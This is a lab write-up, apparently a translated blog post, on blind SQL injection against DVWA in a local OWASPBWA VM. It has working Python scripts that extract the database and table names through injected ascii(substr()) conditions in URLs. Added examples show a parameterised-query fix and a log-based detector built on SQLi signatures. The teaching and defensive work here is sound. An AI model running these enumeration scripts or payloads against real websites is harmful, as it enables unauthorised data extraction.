Purpose
Understand the principle, method and process of blind SQL injection, and use functions specific to each database engine to probe it and extract information.
Environment
System: Kali Linux 2019 (IP: 10.10.10.128)
Platform: DVWA in OWASPBWA v0.94 (IP: 10.10.10.131)
Interface
Procedure
The idea is to use the substr function to guess the database name: take one character at a time, convert it to its ASCII value, and compare it position by position.
Syntax
substr(strings,offset,length)
- strings: required; the database field (string) to extract from
- offset: required; the starting position within strings
- length: required; the number of characters to extract
Python code
Probing the database name
import requests
import re

# Headers copied from a logged-in browser session. The Cookie carries the DVWA
# security level and the PHPSESSID; without it the page redirects to the login form.
header = {
    "Host": "10.10.10.131",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Cookie": "security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Cache-Control": "max-age=0"
}

def getDBName():
    DBName = ""
    # Boolean condition: is the {0}-th character of database() equal to ASCII code {1}?
    url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr(database(),{0},1))={1} %23&Submit=Submit"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve database name...")
    for i in range(1, 5):              # character positions 1..4
        for char in chars:
            char_ascii = ord(char)
            url = url_template.format(i, char_ascii)
            response = requests.session().get(url, headers=header)
            # "Surname:" is only printed when the query returned a row, i.e. the condition was true
            pattern = re.compile(r'Surname:')
            match = pattern.search(response.text)
            if match:
                DBName += char
                break
    print("Retrieve completed\nDBName is: " + DBName)

getDBName()
Import the regular-expression and HTTP-request modules. Because the injection requires being logged in, the request headers must be set correctly and the response should come from a session (session()). Most examples I found online simply use requests.get(url), so you have to adapt them to your own situation. In particular, make sure the URL is not missing any required field: at first I forgot the "&Submit=Submit" parameter and got no results at all.
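To see why matching on "Surname:" gives the script above a one-bit oracle, and what removes that oracle, here is an added example that is not code from the original post or from DVWA: a small sqlite3 stand-in for the DVWA users table, with the query built by string concatenation next to a version that validates the input type and binds the value as a parameter. The table rows, the render() output format and the constant 1=1 / 1=2 test pair are constructed for the example; sqlite3 stands in for MySQL, so the comment marker is "--" rather than "#".

```python
import sqlite3

# Constructed in-memory stand-in for the DVWA "users" table (sample rows, not DVWA's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown")])
    return conn

def lookup_vulnerable(conn, user_input):
    # The user's string is spliced into the SQL text, so a closing quote followed by
    # "AND <condition> --" turns the query into a true/false test chosen by the client.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_input}'"
    return conn.execute(sql).fetchone()

def lookup_safe(conn, user_input):
    # Defence 1: enforce the type the application actually expects.
    try:
        user_id = int(user_input)
    except ValueError:
        return None
    # Defence 2: bind the value as a parameter; it can never become SQL syntax.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchone()

def render(row):
    # Approximates the fragment of the DVWA page that the post's script greps for.
    if row is None:
        return "<pre></pre>"
    return f"<pre>First name: {row[0]}<br />Surname: {row[1]}</pre>"

def oracle(lookup, conn, user_input):
    # The post's script reduces every response to one bit: does "Surname:" appear?
    return "Surname:" in render(lookup(conn, user_input))

# Constructed boolean test pair: constant conditions, one always true, one always false.
TRUE_PAYLOAD = "1' AND 1=1 --"
FALSE_PAYLOAD = "1' AND 1=2 --"

def demo():
    conn = make_db()
    return {
        "vulnerable_true": oracle(lookup_vulnerable, conn, TRUE_PAYLOAD),
        "vulnerable_false": oracle(lookup_vulnerable, conn, FALSE_PAYLOAD),
        "safe_true": oracle(lookup_safe, conn, TRUE_PAYLOAD),
        "safe_false": oracle(lookup_safe, conn, FALSE_PAYLOAD),
        "safe_normal": oracle(lookup_safe, conn, "1"),
    }

if __name__ == "__main__":
    for name, leaked_bit in demo().items():
        print(f"{name}: {leaked_bit}")
```

Against the concatenating version the two inputs produce different pages, which is exactly the signal the loop above reads; against the parameterised version both inputs are treated as an invalid user id and the page never varies, so no bit leaks no matter what expression is placed inside the condition.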
Probing table names
import requests
import re

# Same logged-in session headers as above.
header = {
    "Host": "10.10.10.131",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Cookie": "security=low; PHPSESSID=vr7sjjt900ulgougqr1asmb346; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Cache-Control": "max-age=0"
}

def getTableName():
    # {0}: table index (LIMIT offset), {1}: character position, {2}: ASCII code to compare against
    url_template = "http://10.10.10.131/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))={2} %23&Submit=Submit"
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    print("Start to retrieve table name...")
    print("-------------------------------")
    for i in range(0, 2):                  # number of tables
        TableName = ""
        for j in range(1, 10):             # length of table_name
            for char in chars:
                char_ascii = ord(char)
                url = url_template.format(i, j, char_ascii)
                response = requests.session().get(url, headers=header)
                pattern = re.compile(r'Surname:')
                match = pattern.search(response.text)
                if match:
                    TableName += char
                    break
        if len(TableName) == 0:
            print("Can't find")
        else:
            print(TableName)
        print("-------------------------------")
    print("Finish retrieving!")

getTableName()
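Because the enumeration above issues one request per candidate character, its traffic pattern is loud: dozens of requests from a single client, each carrying ascii(substr( and, in the table stage, information_schema, with only the offset or the comparison value changing. The following is an added detection example, not code from the original post, that parses constructed Apache-style access log lines, URL-decodes the query string, matches a few signatures of this technique and reports clients that exceed a request threshold. The log lines, the signature names, the benign client address and the threshold are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined"-style access log line (constructed format assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures of boolean-based, character-by-character probing, matched on the decoded URL.
SIGNATURES = {
    "ascii_substr": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "information_schema": re.compile(r"information_schema\.", re.I),
    "quote_and_comment": re.compile(r"['\"]\s*(?:and|or)\b.*(?:#|--)", re.I | re.S),
}

# Constructed sample log: four probes from one client, two benign requests from another.
SAMPLE_LOG = [
    '10.10.10.128 - - [19/Jun/2019:10:15:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=100%20%23&Submit=Submit HTTP/1.1" 200 4233',
    '10.10.10.128 - - [19/Jun/2019:10:15:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),1,1))=101%20%23&Submit=Submit HTTP/1.1" 200 4233',
    '10.10.10.128 - - [19/Jun/2019:10:15:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr(database(),2,1))=118%20%23&Submit=Submit HTTP/1.1" 200 4233',
    '10.10.10.128 - - [19/Jun/2019:10:15:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=103%20%23&Submit=Submit HTTP/1.1" 200 4233',
    '10.10.10.50 - - [19/Jun/2019:10:16:10 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4251',
    '10.10.10.50 - - [19/Jun/2019:10:16:11 +0000] "GET /dvwa/dvwa/css/main.css HTTP/1.1" 200 1203',
]

def parse_line(line):
    """Return the fields of one log line plus the URL-decoded path, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %27 / %20 / %23 so the signatures see the same text the database saw.
    rec["decoded_path"] = unquote_plus(rec["path"])
    return rec

def matched_signatures(decoded_path):
    """Names of all signatures that fire on a decoded request path."""
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded_path)]

def analyze(lines, threshold=3):
    """Aggregate signature hits per client IP; report clients at or above the threshold."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = matched_signatures(rec["decoded_path"])
        if not hits:
            continue
        entry = per_ip.setdefault(rec["ip"], {"count": 0, "signatures": set()})
        entry["count"] += 1
        entry["signatures"].update(hits)
    return {
        ip: {"count": e["count"], "signatures": sorted(e["signatures"])}
        for ip, e in per_ip.items() if e["count"] >= threshold
    }

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {info['count']} probing requests, signatures={info['signatures']}")
```

The signature on the quote-plus-comment shape is deliberately last and broadest; in production the per-client count over a short window is the more reliable signal, since a legitimate user never sends sixty near-identical requests per second that differ only in one number.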
Summary
The overall process is fairly simple, but in practice it did not go that smoothly; it takes repeated hands-on practice.
Take more notes, and keep motivating yourself!
Reference
https://blog.csdn.net/sophia9301/article/details/78215264
https://blog.csdn.net/MAILLIBIN/article/details/84592940